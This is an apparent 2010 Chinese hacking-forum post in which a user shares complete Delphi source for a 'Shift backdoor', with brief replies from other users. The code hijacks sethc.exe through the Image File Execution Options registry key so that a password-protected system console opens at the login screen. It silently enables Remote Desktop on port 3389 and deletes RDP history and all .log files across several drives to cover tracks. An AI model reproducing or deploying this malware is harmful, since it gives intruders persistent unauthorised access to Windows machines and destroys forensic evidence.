
标题: 共享下我的Shift后门

作者: hyrz    时间: 2010-2-4 13:01     标题: 共享下我的Shift后门

  1. program shiftBlackdoor;

  2. {$APPTYPE CONSOLE}

  3. uses
  4. windows,registry,shellapi;


  5. const
  6. password='adminhy';   //c32asm   OK!

  7. var
  8. shiftvalue:integer;


  9. procedure shift;
  10. var
  11. system:array[0..255]of char;
  12. mefile: array[0..MAX_PATH] of Char;
  13. key:Tregistry;
  14. begin
  15. GetModuleFileName(0, mefile, Length(mefile));
  16. getsystemdirectory(system,255);
  17. Copyfile(mefile,pchar(system+'\ntcsx.bat'),true);
  18. if shiftvalue=1 then
  19. begin
  20. key:=tregistry.Create;
  21. getsystemdirectory(system,255);
  22. try
  23. key.RootKey:=HKEY_LOCAL_MACHINE;
  24. key.OpenKey('SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options',false);
  25. key.DeleteKey('sethc.exe');
  26. key.CreateKey('sethc.EXE');
  27. key.OpenKey('sethc.exe',false);
  28. key.WriteString('Debugger',system+'\ntcsx.bat');
  29. key.CloseKey;
  30. key.Free;
  31. except
  32. else
  33. writeln('Setup Door Error!');
  34. sleep(1000*60*800);
  35. writeln;
  36. end
  37. end
  38. else
  39. if shiftvalue=2 then
  40. begin
  41. try
  42. key:=Tregistry.Create;
  43. key.RootKey:=HKEY_LOCAL_MACHINE;
  44. key.OpenKey('SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options',false);
  45. key.DeleteKey('sethc.exe');
  46. Messagebox(0,'Clear OK!','Message',MB_iconEXClamation);
  47. finally
  48. end;
  49. end;
  50. end;

  51. Procedure Open3389;//开3389
  52. var
  53. bat:textfile;
  54. begin
  55. assignfile(bat,'C:\3389.bat');
  56. try
  57. rewrite(bat);
  58. writeln(bat,'@echo off');
  59. writeln(bat,'@echo Windows Registry Editor Version 5.00>>3389.reg');
  60. writeln(bat,'@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg');
  61. writeln(bat,'@echo "fDenyTSConnections"=dword:00000000>>3389.reg');
  62. writeln(bat,'@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg');
  63. writeln(bat,'@echo "PortNumber"=dword:00000d3d>>3389.reg');
  64. writeln(bat,'@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg');
  65. writeln(bat,'@echo "PortNumber"=dword:00000d3d>>3389.reg');
  66. writeln(bat,'@regedit /s 3389.reg');
  67. writeln(bat,'@del 3389.reg');
  68. finally
  69. Closefile(bat);
  70. end;
  71. winexec('C:\3389.bat',SW_hide);
  72. end;

  73. procedure clearlogs; //清除部分日志
  74. var
  75. bat:textfile;
  76. begin
  77. try
  78. Deletefile('C:\3389.bat');
  79. assignfile(bat,'C:\clear.bat');
  80. rewrite(bat);
  81. writeln(bat,'@echo off');
  82. writeln(bat,'@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f');
  83. writeln(bat,'@del "%USERPROFILE%\My Documents\Default.rdp" /a');
  84. writeln(bat,'@echo Clear 3389LOG Success.');
  85. writeln(bat,'Clear Temp Log.');
  86. writeln(bat,'@del C:\*.log /q /s /f');
  87. writeln(bat,'@del D:\*.log /q /s /f');
  88. writeln(bat,'@del E:\*.log /q /s /f');
  89. writeln(bat,'@del F:\*.log /q /s /f');
  90. writeln(bat,'@del %0');
  91. finally
  92. closefile(bat);
  93. winexec('c:\clear.bat',SW_hide);
  94. end;
  95. end;


  96. procedure mem;//功能
  97. var
  98. gl:integer;
  99. begin
  100. writeln('===================================================================');
  101. writeln(' 1.CMD.EXE. 2.EXPLORER.EXE. 3.Clear LOGS. 4.Clear Door. 5.About.');
  102. writeln('===================================================================');
  103. writeln;
  104. write('>>');
  105. read(gl);
  106. writeln('OK...');
  107. if gl=1 then
  108. begin
  109. winexec('cmd.exe /c cls',SW_show);
  110. winexec('cmd.exe',SW_show);
  111. halt;
  112. end
  113. else
  114. if gl=2 then
  115. begin
  116. winexec('explorer.exe',SW_show);
  117. halt;
  118. end
  119. else
  120. if gl=3 then
  121. begin
  122. clearlogs;
  123. sleep(1000*60*1996);
  124. end
  125. else
  126. if gl=4 then
  127. begin
  128. shiftvalue:=2;
  129. shift;
  130. exit;
  131. end
  132. else
  133. if gl=5 then
  134. begin
  135. readln;
  136. writeln('======================Shift Door About========================');
  137. writeln;
  138. writeln('Shift BlackDoor 4.0');
  139. writeln('BY:Hyrz');
  140. writeln('E-mail:bsoom@163.com');
  141. writeln;
  142. writeln('===============================END=========================== ');
  143. readln;
  144. exit;
  145. end
  146. else
  147. readln;
  148. writeln('Command Error!');
  149. readln;
  150. clearlogs;
  151. end;

  152. ///////////////////////////Main/////////////////////////////

  153. var
  154. pass:string;
  155. begin
  156. shiftvalue:=1;
  157. shift;
  158. open3389;
  159. begin
  160. writeln('===============================');
  161. write('Password:');read(pass);
  162. if (pass=password) then
  163. begin
  164. writeln;
  165. mem;
  166. exit;
  167. end
  168. else
  169. writeln;
  170. writeln('Password Error!');
  171. writeln;
  172. writeln('Bye..Bye...');
  173. sleep(2000);
  174. end;
  175. end.

作者: 441545795    时间: 2010-2-4 13:27

这是什么哦 好深奥哦
作者: hyrz    时间: 2010-2-4 13:37

这是什么哦 好深奥哦
441545795 发表于 2010-2-4 13:27


呵呵,理解。
作者: 柔肠寸断    时间: 2010-2-4 16:40

编译过来啊。。。
作者: 柔肠寸断    时间: 2010-2-4 16:40

编译过来啊。。。,,,,
作者: hack.晓雨    时间: 2010-2-5 16:46

呵呵,学习了,我也不是很懂。



